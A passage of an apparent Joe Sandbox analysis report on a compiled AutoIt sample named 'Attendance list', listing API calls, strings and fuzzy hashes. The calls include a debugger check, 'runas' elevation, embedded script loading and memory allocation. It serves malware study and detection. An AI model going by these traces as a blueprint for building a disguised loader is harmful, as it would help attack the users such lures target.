84 API calls 
102260 8fd374 102253->102260 102261 8c36b3 102253->102261 102283 8c4531 64 API calls _memset 102254->102283 102256 8fd343 102286 8d11f3 341 API calls Mailbox 102256->102286 102257->102249 102265 8fd2c8 102258->102265 102266 8fd2e7 SetFocus 102258->102266 102260->102241 102288 91817e 59 API calls Mailbox 102260->102288 102268 8c36be 102261->102268 102269 8c374b 102261->102269 102262 8fd3a1 102262->102241 102262->102249 102265->102268 102271 8fd2d1 102265->102271 102266->102249 102267 8c370c 102281 8c3114 DeleteObject DestroyWindow Mailbox 102267->102281 102268->102241 102287 8c44cb Shell_NotifyIconW _memset 102268->102287 102282 8c45df 81 API calls _memset 102269->102282 102270 8c375b 102270->102249 102284 8d11d0 10 API calls Mailbox 102271->102284 102277 8fd368 102278 8c43db 68 API calls 102277->102278 102278->102279 102279->102241 102280->102267 102281->102249 102282->102270 102283->102270 102284->102249 102285->102256 102286->102268 102287->102277 102288->102279 102289->102262

                        Control-flow Graph

                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C3B7A
                        • IsDebuggerPresent.KERNEL32 ref: 008C3B8C
                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,009862F8,009862E0,?,?), ref: 008C3BFD
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                          • Part of subcall function 008D0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008C3C26,009862F8,?,?,?), ref: 008D0ACE
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008C3C81
                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009793F0,00000010), ref: 008FD4BC
                        • SetCurrentDirectoryW.KERNEL32(?,009862F8,?,?,?), ref: 008FD4F4
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00975D40,009862F8,?,?,?), ref: 008FD57A
                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 008FD581
                          • Part of subcall function 008C3A58: GetSysColorBrush.USER32(0000000F), ref: 008C3A62
                          • Part of subcall function 008C3A58: LoadCursorW.USER32(00000000,00007F00), ref: 008C3A71
                          • Part of subcall function 008C3A58: LoadIconW.USER32(00000063), ref: 008C3A88
                          • Part of subcall function 008C3A58: LoadIconW.USER32(000000A4), ref: 008C3A9A
                          • Part of subcall function 008C3A58: LoadIconW.USER32(000000A2), ref: 008C3AAC
                          • Part of subcall function 008C3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008C3AD2
                          • Part of subcall function 008C3A58: RegisterClassExW.USER32(?), ref: 008C3B28
                          • Part of subcall function 008C39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C3A15
                          • Part of subcall function 008C39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3A36
                          • Part of subcall function 008C39E7: ShowWindow.USER32(00000000,?,?), ref: 008C3A4A
                          • Part of subcall function 008C39E7: ShowWindow.USER32(00000000,?,?), ref: 008C3A53
                          • Part of subcall function 008C43DB: _memset.LIBCMT ref: 008C4401
                          • Part of subcall function 008C43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C44A6
                        Strings
                        • This is a third-party compiled AutoIt script., xrefs: 008FD4B4
                        • runas, xrefs: 008FD575
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                        • String ID: This is a third-party compiled AutoIt script.$runas
                        • API String ID: 529118366-3287110873
                        • Opcode ID: 3dfc08d7dff28294e524914f54a51428eaef268155ea224de44f613c2a6432da
                        • Instruction ID: d59256d2084f011a0ef3643437f24ad4c61e889b5b6307b530257b61a699039c
                        • Opcode Fuzzy Hash: 3dfc08d7dff28294e524914f54a51428eaef268155ea224de44f613c2a6432da
                        • Instruction Fuzzy Hash: 40510931908249AECF11ABB8DC15FFD7B75FB45304F0081ADF561EA261DA74C646DB22

                        Control-flow Graph

                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 008C4B2B
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • GetCurrentProcess.KERNEL32(?,0094FAEC,00000000,00000000,?), ref: 008C4BF8
                        • IsWow64Process.KERNEL32(00000000), ref: 008C4BFF
                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008C4C45
                        • FreeLibrary.KERNEL32(00000000), ref: 008C4C50
                        • GetSystemInfo.KERNEL32(00000000), ref: 008C4C81
                        • GetSystemInfo.KERNEL32(00000000), ref: 008C4C8D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                        • String ID:
                        • API String ID: 1986165174-0
                        • Opcode ID: 94dcbab13e32b1e59a0cb9bfc08a3aff216f76511d18dcd28a03cb4eb208c538
                        • Instruction ID: afa85d7ad87735c882f60e840fbd2a275520d4669aad9daaec5e064c9ab03e95
                        • Opcode Fuzzy Hash: 94dcbab13e32b1e59a0cb9bfc08a3aff216f76511d18dcd28a03cb4eb208c538
                        • Instruction Fuzzy Hash: AB91C33154A7C8DEC731DB788461AAABFF5FF2A310B54599DD1CAC3A01D230E948D72A

                        Control-flow Graph

                        APIs
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008C4EEE,?,?,00000000,00000000), ref: 008C4FF9
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008C4EEE,?,?,00000000,00000000), ref: 008C5010
                        • LoadResource.KERNEL32(?,00000000,?,?,008C4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008C4F8F), ref: 008FDD60
                        • SizeofResource.KERNEL32(?,00000000,?,?,008C4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008C4F8F), ref: 008FDD75
                        • LockResource.KERNEL32(008C4EEE,?,?,008C4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008C4F8F,00000000), ref: 008FDD88
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: bf2ffe1e9b4e9d276c0de063d0fd97712189d78c18acdacb3dd30dc28ceadc48
                        • Instruction ID: 55b4db502bd77fd8078c3313c4549a0d6b6b8f2062e24f8fa50d03e8747fa18f
                        • Opcode Fuzzy Hash: bf2ffe1e9b4e9d276c0de063d0fd97712189d78c18acdacb3dd30dc28ceadc48
                        • Instruction Fuzzy Hash: 80115A75200B02AFDB218B65DC68F677BB9FBCAB51F20416CF516C6260DBB1E8409660
                        APIs
                        • GetFileAttributesW.KERNELBASE(?,008FE7C1), ref: 009246A6
                        • FindFirstFileW.KERNELBASE(?,?), ref: 009246B7
                        • FindClose.KERNEL32(00000000), ref: 009246C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirst
                        • String ID:
                        • API String ID: 48322524-0
                        • Opcode ID: a121a1b8f60da461c23f59ad337928d478e2031b384e72f6ec14d2d7d96f0314
                        • Instruction ID: fbf6e8112f636312c08620e3faff1d2232d0beed7207fb96c9e215a0e8e4e6f5
                        • Opcode Fuzzy Hash: a121a1b8f60da461c23f59ad337928d478e2031b384e72f6ec14d2d7d96f0314
                        • Instruction Fuzzy Hash: 57E0D8364244119B42106738FC5D8EA775C9E07379F100715F935C10E0E7B059509595
                        Strings
                        • Variable must be of type 'Object'., xrefs: 0090428C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable must be of type 'Object'.
                        • API String ID: 0-109567571
                        • Opcode ID: 6f4a35ceb59cf562625a3e654521f39351a3a8e6eb1e31c96d0462688ea28c92
                        • Instruction ID: 28b899b8c8544577d768f4bd782c877035429e22c85c5d7889b60719cde0dfaf
                        • Opcode Fuzzy Hash: 6f4a35ceb59cf562625a3e654521f39351a3a8e6eb1e31c96d0462688ea28c92
                        • Instruction Fuzzy Hash: 01A26875A04219CFDB24CF98C480FA9B7B2FB58314F24846DEA16AB352D735ED42CB81
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D0BBB
                        • timeGetTime.WINMM ref: 008D0E76
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D0FB3
                        • TranslateMessage.USER32(?), ref: 008D0FC7
                        • DispatchMessageW.USER32(?), ref: 008D0FD5
                        • Sleep.KERNEL32(0000000A), ref: 008D0FDF
                        • LockWindowUpdate.USER32(00000000,?,?), ref: 008D105A
                        • DestroyWindow.USER32 ref: 008D1066
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008D1080
                        • Sleep.KERNEL32(0000000A,?,?), ref: 009052AD
                        • TranslateMessage.USER32(?), ref: 0090608A
                        • DispatchMessageW.USER32(?), ref: 00906098
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009060AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                        • API String ID: 4003667617-3242690629
                        • Opcode ID: f8989dfa16b52ae1b4d7701b1e1e3aeb50fded2803e476c15ae22a9a88254f00
                        • Instruction ID: f7c7e5dff98061a5306c415ae85fa5009ee0a292528e055107658149d6c4f779
                        • Opcode Fuzzy Hash: f8989dfa16b52ae1b4d7701b1e1e3aeb50fded2803e476c15ae22a9a88254f00
                        • Instruction Fuzzy Hash: B7B29C70608741DFDB24DB24C884BAAB7E5FF85304F154A1EE49AC72A1DB75E884DF82

                        Control-flow Graph

                        APIs
                          • Part of subcall function 009291E9: __time64.LIBCMT ref: 009291F3
                          • Part of subcall function 008C5045: _fseek.LIBCMT ref: 008C505D
                        • __wsplitpath.LIBCMT ref: 009294BE
                          • Part of subcall function 008E432E: __wsplitpath_helper.LIBCMT ref: 008E436E
                        • _wcscpy.LIBCMT ref: 009294D1
                        • _wcscat.LIBCMT ref: 009294E4
                        • __wsplitpath.LIBCMT ref: 00929509
                        • _wcscat.LIBCMT ref: 0092951F
                        • _wcscat.LIBCMT ref: 00929532
                          • Part of subcall function 0092922F: _memmove.LIBCMT ref: 00929268
                          • Part of subcall function 0092922F: _memmove.LIBCMT ref: 00929277
                        • _wcscmp.LIBCMT ref: 00929479
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AAE
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AC1
                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009296DC
                        • _wcsncpy.LIBCMT ref: 0092974F
                        • DeleteFileW.KERNEL32(?,?), ref: 00929785
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0092979B
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009297AC
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009297BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                        • String ID:
                        • API String ID: 1500180987-0
                        • Opcode ID: 08a2c8ddb4f690d3b47e476e18643c0aa806529a48aa23eb1deca5dd677db8fc
                        • Instruction ID: 78ad0c1dd8d96374ee557c39900e2b1c3f3ca9d7925d8d4f90fc287f7d55e993
                        • Opcode Fuzzy Hash: 08a2c8ddb4f690d3b47e476e18643c0aa806529a48aa23eb1deca5dd677db8fc
                        • Instruction Fuzzy Hash: E1C14BB1D00229AADF21DFA9DC85EDEB7BDEF45300F0040AAF609E7155DB709A848F65

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 008C3074
                        • RegisterClassExW.USER32(00000030), ref: 008C309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C30AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 008C30CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C30DC
                        • LoadIconW.USER32(000000A9), ref: 008C30F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C3101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 2ebac77abdb18377da82352852032e384787209d8a124e9e58cfdef3098233d1
                        • Instruction ID: 9f76ff18deb6587da76b954083d96f028d7f4aeab3e37613017a7a50d227fcc6
                        • Opcode Fuzzy Hash: 2ebac77abdb18377da82352852032e384787209d8a124e9e58cfdef3098233d1
                        • Instruction Fuzzy Hash: E0314A7586930AEFDB10CFA4D888BD9BBF4FF09310F10456AE550EA2A0D3B90545DF51

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 008C3074
                        • RegisterClassExW.USER32(00000030), ref: 008C309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C30AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 008C30CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C30DC
                        • LoadIconW.USER32(000000A9), ref: 008C30F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C3101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 2d6934e07a89f58742e65421e1f0fe5df2ff04da4b13c27f75fa46cebc35a48f
                        • Instruction ID: 2c3888a0b0819b1412feab5421388d9e85cc5422ef950c673b3ac6316d62ab03
                        • Opcode Fuzzy Hash: 2d6934e07a89f58742e65421e1f0fe5df2ff04da4b13c27f75fa46cebc35a48f
                        • Instruction Fuzzy Hash: FB21E5B5965209AFDB00DFA4E888B9DBBF4FB09700F00412AF514EA3A0D7B54544AF91

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008C4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009862F8,?,008C37C0,?), ref: 008C4882
                          • Part of subcall function 008E074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008C72C5), ref: 008E0771
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008C7308
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008FECF1
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008FED32
                        • RegCloseKey.ADVAPI32(?), ref: 008FED70
                        • _wcscat.LIBCMT ref: 008FEDC9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 2673923337-2727554177
                        • Opcode ID: 1cbc025cb9567bbc977ad8d4859c2f495916ef937f1dd26977631ee882fa023c
                        • Instruction ID: f22b2b2383d66de52f8a83cb437485fe9aaf8a0135036499edbde34d18d8a058
                        • Opcode Fuzzy Hash: 1cbc025cb9567bbc977ad8d4859c2f495916ef937f1dd26977631ee882fa023c
                        • Instruction Fuzzy Hash: FE71597101C3059AC714EFA9EC81DABBBF8FB85350B50492EF565C32A1EB30D948DB62

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 008C3A62
                        • LoadCursorW.USER32(00000000,00007F00), ref: 008C3A71
                        • LoadIconW.USER32(00000063), ref: 008C3A88
                        • LoadIconW.USER32(000000A4), ref: 008C3A9A
                        • LoadIconW.USER32(000000A2), ref: 008C3AAC
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008C3AD2
                        • RegisterClassExW.USER32(?), ref: 008C3B28
                          • Part of subcall function 008C3041: GetSysColorBrush.USER32(0000000F), ref: 008C3074
                          • Part of subcall function 008C3041: RegisterClassExW.USER32(00000030), ref: 008C309E
                          • Part of subcall function 008C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C30AF
                          • Part of subcall function 008C3041: InitCommonControlsEx.COMCTL32(?), ref: 008C30CC
                          • Part of subcall function 008C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C30DC
                          • Part of subcall function 008C3041: LoadIconW.USER32(000000A9), ref: 008C30F2
                          • Part of subcall function 008C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C3101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: 642c5b2e91e8a74dee974619cab70ec4be5efc291c798320be63d8acc0ba70d1
                        • Instruction ID: 2c4c7787e2632b943b5192d2a169d035ac6f864bdcf7723135cc2d98858b91ac
                        • Opcode Fuzzy Hash: 642c5b2e91e8a74dee974619cab70ec4be5efc291c798320be63d8acc0ba70d1
                        • Instruction Fuzzy Hash: 0F216D70928308AFEB109FA4EC09F9D7BB4FB08710F004169E510EA3A0C3B95654AF84

                        Control-flow Graph

                        control_flow_graph 767 8c3633-8c3681 [edge list omitted; nodes reference DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow, SetFocus]
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 008C36D2
                        • KillTimer.USER32(?,00000001), ref: 008C36FC
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C371F
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C372A
                        • CreatePopupMenu.USER32 ref: 008C373E
                        • PostQuitMessage.USER32(00000000), ref: 008C375F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: 64900485f803844870e9f1a5b1630fb1ac33fb12e925ce821ff8b8db9117c151
                        • Instruction ID: 3da8f11c975c524b2cdf0119bb873c1df4a7eeb04ab30bfee909394dde500bb6
                        • Opcode Fuzzy Hash: 64900485f803844870e9f1a5b1630fb1ac33fb12e925ce821ff8b8db9117c151
                        • Instruction Fuzzy Hash: 8241D5B2218209BBDF246B68EC09F793775FB11304F14412DF606CA3A1DA74DA52B7A2

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                        • API String ID: 1825951767-3513169116
                        • Opcode ID: 81a8880d4a98ede9de3f94bf491c20a181bcfdf8379f132adcd494e86f583997
                        • Instruction ID: 5052514ceec6c52b475f000fa561defcbad70e31db96a794d778a6f280bcfc06
                        • Opcode Fuzzy Hash: 81a8880d4a98ede9de3f94bf491c20a181bcfdf8379f132adcd494e86f583997
                        • Instruction Fuzzy Hash: FBA13D7281022D9ACB14EBA8CC95EEEB7B8FF15300F04446DE556E7191EF74DA09CB61

                        Control-flow Graph

                        control_flow_graph 942 e825c0-e8266e [edge list omitted; nodes reference CreateFileW, VirtualAlloc, ReadFile, FindCloseChangeNotification, VirtualFree]
                        APIs
